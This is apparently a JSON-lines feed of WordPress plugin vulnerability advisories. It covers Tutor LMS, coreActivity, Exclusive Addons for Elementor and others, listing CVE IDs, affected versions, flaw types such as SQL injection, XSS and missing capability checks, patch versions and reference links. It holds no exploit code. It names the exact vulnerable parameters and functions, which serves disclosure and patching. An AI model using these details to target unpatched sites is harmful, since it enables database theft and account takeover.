{"CVE_ID":"CVE-2025-3436","slug":"coreactivity","versionImpact":"2.7","versionEndExcluding":"2.7.1","description":"The coreActivity: Activity Logging for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'order' and 'orderby' parameters in all versions up to, and including, 2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259839\\\/coreactivity\\\/trunk\\\/core\\\/table\\\/Live.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3259839\\\/coreactivity\\\/trunk\\\/core\\\/table\\\/Live.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1ebbb18-0266-49e8-ada3-b63905021846?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1ebbb18-0266-49e8-ada3-b63905021846?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4223","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete data.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce4c4395-6d1a-4d5f-885f-383e5c44c0f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce4c4395-6d1a-4d5f-885f-383e5c44c0f8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4318","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018question_id\u2019 parameter in versions up to, and including, 2.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Instructor-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bbb3c65-f02c-4d6d-bd4e-b3232af5e21b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bbb3c65-f02c-4d6d-bd4e-b3232af5e21b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4456\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4456\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/Utils.php#L4575\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4279","slug":"tutor","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Insecure Direct Object Reference to Arbitrary Course Deletion in versions up to, and including, 2.7.0 via the 'tutor_course_delete' function due to missing validation on a user controlled key. This can allow authenticated attackers, with Instructor-level permissions and above, to delete any course.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d04643-e43a-4732-91bf-e4af7b622e33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d04643-e43a-4732-91bf-e4af7b622e33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Course_List.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Course_List.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086489\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4352","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the \u2018year\u2019 parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c647beda-cf73-4372-975f-a8c8ed05217f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c647beda-cf73-4372-975f-a8c8ed05217f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4351","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59859583-49e5-4a80-8659-b9ca7ddc089d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59859583-49e5-4a80-8659-b9ca7ddc089d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4222","slug":"tutor-pro","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942fffb6-2719-4b70-9759-21b2d50002c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/942fffb6-2719-4b70-9759-21b2d50002c5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"name\":\"https:\\\/\\\/www.themeum.com\\\/product\\\/tutor-lms\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5607","slug":"ninja-gdpr-compliance","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The GDPR CCPA Compliance & Cookie Consent Banner plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions named ajaxUpdateSettings() in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the plugin's settings, update page content, send arbitrary emails and inject malicious web scripts.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f870a6-26a5-4f98-9bd6-12736c561265?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8f870a6-26a5-4f98-9bd6-12736c561265?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097680%40ninja-gdpr-compliance&new=3097680%40ninja-gdpr-compliance&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097680%40ninja-gdpr-compliance&new=3097680%40ninja-gdpr-compliance&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5958","slug":"post-smtp","versionImpact":"2.7.0","versionEndExcluding":"2.7.1","description":"The POST SMTP Mailer WordPress plugin before 2.7.1 does not escape email message content before displaying it in the backend, allowing an unauthenticated attacker to perform XSS attacks against highly privileged users.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22fa478d-e42e-488d-9b4b-a8720dec7cee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22fa478d-e42e-488d-9b4b-a8720dec7cee\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5604","slug":"asgaros-forum","versionEndExcluding":"2.7.1","description":"The Asgaros Forum WordPress plugin before 2.7.1 allows forum administrators, who may not be WordPress (super-)administrators, to set insecure configuration that allows unauthenticated users to upload dangerous files (e.g. .php, .phtml), potentially leading to remote code execution.","recommendation":"Update to version 2.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ce69d71-87bf-4d95-90f2-63d558c78b69\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4ce69d71-87bf-4d95-90f2-63d558c78b69\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3553","slug":"tutor","versionImpact":"2.6.2","versionEndExcluding":"2.7.0","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the hide_notices function in all versions up to, and including, 2.6.2. This makes it possible for unauthenticated attackers to enable user registration on sites that may have it disabled.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8d4029e-07b0-4ceb-ae6e-11a3f7416ebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8d4029e-07b0-4ceb-ae6e-11a3f7416ebc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076302\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/User.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076302\\\/tutor\\\/tags\\\/2.7.0\\\/classes\\\/User.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13611","slug":"bp-better-messages","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the 'bp-better-messages' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/bp-better-messages directory which can contain file attachments included in chat messages.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/addons\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/addons\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228957\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228957\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/997918b9-2ccd-413e-9df2-d24bc3820ba1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/997918b9-2ccd-413e-9df2-d24bc3820ba1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13612","slug":"bp-better-messages","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'better_messages_live_chat_button' shortcode in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-better-messages\\\/trunk\\\/inc\\\/shortcodes.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228965\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228965\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/169a857f-1ae0-40f6-8a34-10c573af59c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/169a857f-1ae0-40f6-8a34-10c573af59c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8873","slug":"pepro-bacs-receipt-upload-for-woocommerce","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The PeproDev WooCommerce Receipt Uploader plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.6.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e09c2916-6e2c-4db3-901a-b5715d635824?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e09c2916-6e2c-4db3-901a-b5715d635824?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pepro-bacs-receipt-upload-for-woocommerce\\\/trunk\\\/wc-upload-reciept.php#L163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pepro-bacs-receipt-upload-for-woocommerce\\\/trunk\\\/wc-upload-reciept.php#L163\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13660","slug":"mobile-friendly-flickr-slideshow","versionImpact":"2.6.1","versionEndExcluding":"2.7.0","description":"The Responsive Flickr Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fshow' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-friendly-flickr-slideshow\\\/tags\\\/2.6.1\\\/mobile-friendly-flickr-slideshow.php#L191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-friendly-flickr-slideshow\\\/tags\\\/2.6.1\\\/mobile-friendly-flickr-slideshow.php#L191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8023be86-2bdb-4f16-9b54-a959f1e75e46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8023be86-2bdb-4f16-9b54-a959f1e75e46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11898","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.6.9","versionEndExcluding":"2.7.0","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swin-campaign' shortcode in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.6.9\\\/socialscratchwin.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.6.9\\\/socialscratchwin.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199234%40scratch-win-giveaways-for-website-facebook&new=3199234%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199234%40scratch-win-giveaways-for-website-facebook&new=3199234%40scratch-win-giveaways-for-website-facebook&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b7f3f0f-5f02-41d7-ac37-ecdde74fc532?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b7f3f0f-5f02-41d7-ac37-ecdde74fc532?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5666","slug":"accordions-wp","versionImpact":"2.6","versionEndExcluding":"2.7","description":"The Accordion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcpaccordion' shortcode in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982015\\\/accordions-wp#file370\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982015\\\/accordions-wp#file370\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ada876-4a8b-494f-9132-d88a71b42c44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ada876-4a8b-494f-9132-d88a71b42c44?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordions-wp\\\/trunk\\\/theme\\\/custom-wp-accordion-themes.php?rev=2406278#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accordions-wp\\\/trunk\\\/theme\\\/custom-wp-accordion-themes.php?rev=2406278#L24\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1597","slug":"td-cloud-library","versionEndExcluding":"2.7","description":"The tagDiv Cloud Library WordPress plugin before 2.7 does not have authorisation and CSRF in an AJAX action accessible to both unauthenticated and authenticated users, allowing unauthenticated users to change arbitrary user metadata, which could lead to privilege escalation by setting themselves as an admin of the blog.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4eafe111-8874-4560-83ff-394abe7a803b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4eafe111-8874-4560-83ff-394abe7a803b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3721","slug":"wp-email","versionEndExcluding":"2.69.1","description":"The WP-EMail WordPress plugin before 2.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f90347a-6586-4648-9f2c-d4f321bf801a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f90347a-6586-4648-9f2c-d4f321bf801a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5332","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.8","versionEndExcluding":"2.6.9.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Card widget in all versions up to, and including, 2.6.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c547cc-2820-4138-b042-a0ec2e7f2fca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c547cc-2820-4138-b042-a0ec2e7f2fca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103786\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103786\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3985","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.4","versionEndExcluding":"2.6.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Call to Action widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/206c5736-d9d9-4029-afdf-d76251cc81ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/206c5736-d9d9-4029-afdf-d76251cc81ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/call-to-action\\\/call-to-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/call-to-action\\\/call-to-action.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3489","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.4","versionEndExcluding":"2.6.9.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the Countdown Expired Title in all versions up to, and including, 2.6.9.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76b987f1-2524-498a-a02c-a3ca390026e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76b987f1-2524-498a-a02c-a3ca390026e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/countdown-timer\\\/countdown-timer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074085\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/countdown-timer\\\/countdown-timer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2750","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9.3","versionEndExcluding":"2.6.9.4","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of the Button widget in all versions up to, and including, 2.6.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011b783-e4b4-45d2-81af-2f8d166a30ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072751\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/button\\\/button.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3072751\\\/exclusive-addons-for-elementor\\\/trunk\\\/elements\\\/button\\\/button.php\",\"refsource\":\"\",\"tags\":[]}]"}
